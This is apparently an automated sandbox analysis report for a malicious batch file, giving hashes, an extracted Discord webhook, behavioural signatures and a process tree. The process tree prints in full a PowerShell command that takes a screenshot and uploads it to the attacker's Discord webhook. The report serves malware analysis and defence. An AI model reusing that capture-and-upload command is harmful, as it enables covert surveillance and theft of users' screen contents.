Analysis
-
max time kernel
60s -
max time network
50s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03/06/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
dont run this.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
dont run this.bat
Resource
win10v2004-20240508-en
General
-
Target
dont run this.bat
-
Size
1013B
-
MD5
b4b00681eae6600fb830308d762457fd
-
SHA1
d2d11d34e7c91bf486833265adade5769f406618
-
SHA256
01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28
-
SHA512
d4b4358580da3018436a9a34ec151f9912cc1675edb9474094570ca6aef4e427bf15de28f24f354a9b8cb0554c094f5c941e6461dc350fcad45ac9770b338209
Malware Config
Extracted
https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 27 1860 powershell.exe 46 1620 powershell.exe -
Drops file in Drivers directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\bam.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\synth3dvsc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\UcmTcpciCx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\Microsoft.Bluetooth.Profiles.HidOverGatt.dll cmd.exe File opened for modification C:\Windows\System32\drivers\dxgmms1.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\hidbatt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\EhStorPwdDrv.dll cmd.exe File opened for modification C:\Windows\System32\drivers\kdnic.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rdpvideominiport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\RNDISMP.sys cmd.exe File opened for modification C:\Windows\System32\drivers\USBAUDIO.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wacompen.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ClipSp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\wacompen.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\msgpioclx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\winhv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\stornvme.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbser.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\netvsc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\mslldp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\pnpmem.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rassstp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wanarp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\EhStorTcgDrv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\ws2ifsl.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\ipnat.sys cmd.exe File opened for modification C:\Windows\System32\drivers\amdk8.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dxgmms2.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\scsiport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\ndistapi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\winnat.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\nwifi.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\tcpip.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\sermouse.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\atapi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\serial.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\volmgrx.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\bttflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\mountmgr.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\tunnel.sys cmd.exe File opened for modification C:\Windows\System32\drivers\BthHfEnum.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hwpolicy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\npfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\SDFRd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\sdbus.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\hvcrash.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\SMCCx.dll cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\fvevol.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\luafv.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\hyperkbd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pci.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\rdpbus.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UcmCx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\applockerfltr.sys cmd.exe File opened for modification C:\Windows\System32\drivers\AppvVfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mrxsmb20.sys cmd.exe File opened for modification C:\Windows\System32\drivers\volume.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mausbip.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Dumpata.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\dmvsc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\ndiscap.sys cmd.exe File opened for modification C:\Windows\System32\drivers\MTConfig.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wof.sys cmd.exe -
Manipulates Digital Signatures 2 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
description ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll cmd.exe File opened for modification C:\Windows\System32\wintrust.dll cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 27 discord.com 45 discord.com 46 discord.com 26 discord.com -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\daxexec.dll cmd.exe File opened for modification C:\Windows\System32\es-ES\rdpendp.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\Windows.ApplicationModel.Store.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\WPDShextAutoplay.exe.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\authfwcfg.dll.mui cmd.exe File opened for modification C:\Windows\System32\MTF.dll cmd.exe File opened for modification C:\Windows\System32\wbem\Microsoft.AppV.AppVClientWmi.dll cmd.exe File opened for modification C:\Windows\System32\C_737.NLS cmd.exe File opened for modification C:\Windows\System32\de-DE\dnsrslvr.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\shwebsvc.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\ifmon.dll.mui cmd.exe File opened for modification C:\Windows\System32\IME\IMEJP\IMJPCD.DLL cmd.exe File opened for modification C:\Windows\System32\nb-NO\Windows.Media.Speech.UXRes.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\combase.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\rasgcw.dll.mui cmd.exe File opened for modification C:\Windows\System32\TapiUnattend.exe cmd.exe File opened for modification C:\Windows\System32\DriverStore\en-US\c_net.inf_loc cmd.exe File opened for modification C:\Windows\System32\DriverStore\es-ES\c_processor.inf_loc cmd.exe File opened for modification C:\Windows\System32\en-US\authfwgp.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\fidocredprov.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\dinput.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\OpenWith.exe.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\ja-JP\ipmidrv.inf_loc cmd.exe File opened for modification C:\Windows\System32\fr-FR\DpiScaling.exe.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\pnputil.exe.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\ngctasks.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\de-DE\SensorsHidClassDriver.inf_loc cmd.exe File opened for modification C:\Windows\System32\es-ES\blbres.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\snmptrap.exe.mui cmd.exe File opened for modification C:\Windows\System32\FileHistory.exe cmd.exe File opened for modification C:\Windows\System32\fr-FR\mmres.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\b57nd60a.inf_amd64_77a731ab08be20a5\b57nd60a.inf cmd.exe File opened for modification C:\Windows\System32\DriverStore\fr-FR\megasr.inf_loc cmd.exe File opened for modification C:\Windows\System32\es-ES\DWWIN.exe.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\wbengine.exe.mui cmd.exe File opened for modification C:\Windows\System32\uk-UA\recdisc.exe.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\AppointmentApis.dll.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\wudfplatform.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetTCPIP\MSFT_NetTCPConnection.cdxml cmd.exe File opened for modification C:\Windows\System32\en-US\Windows.Storage.Search.dll.mui cmd.exe File opened for modification C:\Windows\System32\en-US\winmsipc.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\rpcnsh.dll.mui cmd.exe File opened for modification C:\Windows\System32\wbem\en-US\UserStateWMIProvider.mfl cmd.exe File opened for modification C:\Windows\System32\es-ES\EapTeapExt.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\DscProxy.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\fr-FR\ArchiveResources.psd1 cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI8607~1.EVT cmd.exe File opened for modification C:\Windows\System32\de-DE\iscsiexe.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\dot3svc.dll.mui cmd.exe File opened for modification C:\Windows\System32\Speech\Engines\SR\es-ES\srloc.dll.mui cmd.exe File opened for modification C:\Windows\System32\wbem\kerberos.mof cmd.exe File opened for modification C:\Windows\System32\de-DE\Netplwiz.exe.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\fr-FR\netirda.inf_loc cmd.exe File opened for modification C:\Windows\System32\it-IT\ncryptprov.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.types.ps1xml cmd.exe File opened for modification C:\Windows\System32\DriverStore\it-IT\adp80xx.inf_loc cmd.exe File opened for modification C:\Windows\System32\es-ES\p2p.dll.mui cmd.exe File opened for modification C:\Windows\System32\KBDINORI.DLL cmd.exe File opened for modification C:\Windows\System32\RMActivate_ssp_isv.exe cmd.exe File opened for modification C:\Windows\System32\uk-UA\timedate.cpl.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\APMon.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\gpupdate.exe.mui cmd.exe File opened for modification C:\Windows\System32\Windows.Security.Authentication.Web.Core.dll cmd.exe File opened for modification C:\Windows\System32\fr-FR\Locator.exe.mui cmd.exe -
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions.
description ioc Process File opened for modification C:\Windows\System32\termsrv.dll cmd.exe -
pid Process 1620 powershell.exe 1860 powershell.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 3796 timeout.exe 3536 timeout.exe 3864 timeout.exe 4292 timeout.exe 956 timeout.exe 2604 timeout.exe 1968 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1860 powershell.exe 1860 powershell.exe 1860 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4856 wrote to memory of 956 4856 cmd.exe 83 PID 4856 wrote to memory of 956 4856 cmd.exe 83 PID 4856 wrote to memory of 4652 4856 cmd.exe 91 PID 4856 wrote to memory of 4652 4856 cmd.exe 91 PID 4856 wrote to memory of 2604 4856 cmd.exe 92 PID 4856 wrote to memory of 2604 4856 cmd.exe 92 PID 4856 wrote to memory of 1380 4856 cmd.exe 96 PID 4856 wrote to memory of 1380 4856 cmd.exe 96 PID 4856 wrote to memory of 1968 4856 cmd.exe 97 PID 4856 wrote to memory of 1968 4856 cmd.exe 97 PID 4856 wrote to memory of 1784 4856 cmd.exe 100 PID 4856 wrote to memory of 1784 4856 cmd.exe 100 PID 4856 wrote to memory of 3796 4856 cmd.exe 101 PID 4856 wrote to memory of 3796 4856 cmd.exe 101 PID 4856 wrote to memory of 4704 4856 cmd.exe 103 PID 4856 wrote to memory of 4704 4856 cmd.exe 103 PID 4856 wrote to memory of 3536 4856 cmd.exe 104 PID 4856 wrote to memory of 3536 4856 cmd.exe 104 PID 4856 wrote to memory of 3852 4856 cmd.exe 107 PID 4856 wrote to memory of 3852 4856 cmd.exe 107 PID 4856 wrote to memory of 3864 4856 cmd.exe 109 PID 4856 wrote to memory of 3864 4856 cmd.exe 109 PID 4856 wrote to memory of 1860 4856 cmd.exe 110 PID 4856 wrote to memory of 1860 4856 cmd.exe 110 PID 4856 wrote to memory of 4292 4856 cmd.exe 116 PID 4856 wrote to memory of 4292 4856 cmd.exe 116 PID 4856 wrote to memory of 1620 4856 cmd.exe 118 PID 4856 wrote to memory of 1620 4856 cmd.exe 118
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Modifies termsrv.dll
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\timeout.exetimeout /t 32⤵
- Delays execution with timeout.exe
PID:956
-
-
C:\Windows\system32\cmd.execmd /k "call :spam"2⤵PID:4652
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2604
-
-
C:\Windows\system32\cmd.execmd /k "call :spam"2⤵PID:1380
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1968
-
-
C:\Windows\system32\cmd.execmd /k "call :spam"2⤵PID:1784
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:3796
-
-
C:\Windows\system32\cmd.execmd /k "call :spam"2⤵PID:4704
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:3536
-
-
C:\Windows\system32\cmd.execmd /k "call :spam"2⤵PID:3852
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\system32\timeout.exetimeout /t 32⤵
- Delays execution with timeout.exe
PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5614f88cf39eb3223246afec4bf1463b4
SHA174d738ee6fdada75ac1ef1645073005e3f6b6cfb
SHA256021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd
SHA51284a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77
-
Filesize
1KB
MD53f072c94071b603b5fefe178891bd77b
SHA1708433e85b632a33c7e1cd2184da7d3665e532d6
SHA2561f8d98e238b6a1b1b5029d0154e09fdcefc0be5da8b6690fa731e66e82e7c55c
SHA5121c42d6e4b06f3396980e682935caa9c886a7a9a3f92d69b85d1dd821a5e33c3b7fc613efa35b70671341e11ce3522d66ca1bda18f922a781161fd42e31800a1e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82